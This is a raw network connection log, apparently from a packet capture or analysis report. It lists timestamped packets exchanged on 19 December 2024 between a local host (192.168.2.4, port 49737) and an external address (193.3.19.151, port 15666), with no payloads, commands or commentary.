Dec 19, 2024 08:52:47.136003017 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136074066 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136104107 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136116982 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136152029 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136230946 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136286020 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136348963 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136377096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136418104 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136434078 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136471033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136518955 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136571884 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136610031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136622906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136646032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136667013 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136678934 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136753082 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136765957 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136786938 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136805058 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136874914 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136888981 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136900902 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136950970 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.136985064 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.136997938 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137012005 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137021065 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137027025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137048006 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137058973 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137126923 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137139082 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137181997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137195110 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137229919 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137233973 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137270927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137270927 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137376070 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137388945 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137432098 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137506962 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137520075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137541056 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137541056 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137553930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137563944 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137597084 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137614012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137639046 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137651920 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137675047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137685061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137748003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137759924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137789965 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137801886 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137857914 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137907982 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137923002 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.137950897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137967110 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.137996912 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138010025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138047934 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138118029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138132095 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138154030 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138161898 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138175964 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138199091 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138199091 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138231993 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138319016 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138331890 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138353109 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138381958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138382912 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138396025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138422012 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138432980 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138439894 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138446093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138473034 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138493061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138525009 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138536930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138566971 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138573885 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138575077 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138586998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138613939 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138632059 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138676882 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138689995 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138765097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138789892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138809919 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138834000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138879061 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138879061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138925076 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138959885 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.138961077 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.138995886 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139040947 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139056921 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139090061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139092922 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139102936 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139125109 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139146090 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139179945 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139192104 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139293909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139344931 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139344931 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139380932 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139415979 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139519930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139532089 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139576912 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139594078 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139606953 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139619112 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139632940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139662027 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139770985 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139782906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139795065 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139810085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139822960 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139836073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139852047 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139874935 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139883041 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139904976 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139919996 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139931917 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139947891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.139967918 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.139983892 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.140011072 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.140022993 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.140121937 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.140172005 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.140177011 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.140208960 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.140212059 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.140250921 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.221522093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.221543074 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.221659899 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.239787102 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.239804029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.239928007 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240015030 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240026951 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240072012 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240098000 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240170002 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240284920 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240339041 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240346909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240458965 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240473986 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240505934 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240535975 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240658998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240742922 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240787983 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.240894079 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240933895 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.240941048 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.241014004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241076946 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241127968 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.241240025 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241276026 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.241302967 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241592884 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241617918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.241678953 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242526054 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242542028 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242573977 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242635012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242647886 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242671013 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242788076 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242801905 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242840052 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242872000 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242882967 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242897987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242928982 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242943048 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.242985964 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.242986917 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243093014 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243117094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243130922 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243155956 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243164062 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243179083 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243195057 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243216991 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243231058 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243275881 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243375063 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243387938 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243437052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243448973 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243483067 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243499994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243504047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243531942 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243586063 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243662119 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243676901 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243712902 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243731022 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243766069 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243781090 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243828058 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243851900 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.243889093 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.243971109 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244019985 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244019985 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244106054 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244153976 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244157076 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244241953 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244247913 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244294882 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244407892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244422913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244462013 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244462013 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244575977 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244621038 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244709015 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244782925 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244796991 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244829893 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.244988918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.244992018 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245002031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245050907 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245095968 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245110989 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245183945 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245189905 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245229006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245372057 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245387077 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245424032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245424032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245543957 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245562077 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245608091 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245616913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245630980 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245666981 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245687008 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245839119 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245852947 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245939970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245955944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.245996952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.245996952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246082067 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246120930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246212959 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246241093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246300936 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246300936 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246339083 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246352911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246434927 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246475935 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246488094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246521950 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246607065 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246653080 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246794939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246809006 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246848106 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246848106 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.246896029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246932030 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.246979952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247034073 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247035027 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247076035 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247173071 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247200012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247255087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247320890 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247334003 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247421980 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247426987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247442007 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247551918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247566938 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247596979 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247617006 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247708082 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247709990 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247757912 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247781038 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247816086 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.247834921 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.247993946 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248018980 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248040915 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248058081 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248117924 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248132944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248260975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248275042 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248313904 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248313904 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248377085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248389959 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248487949 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.248541117 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.248545885 CET	15666	49737	193.3.19.151	192.168.2.4
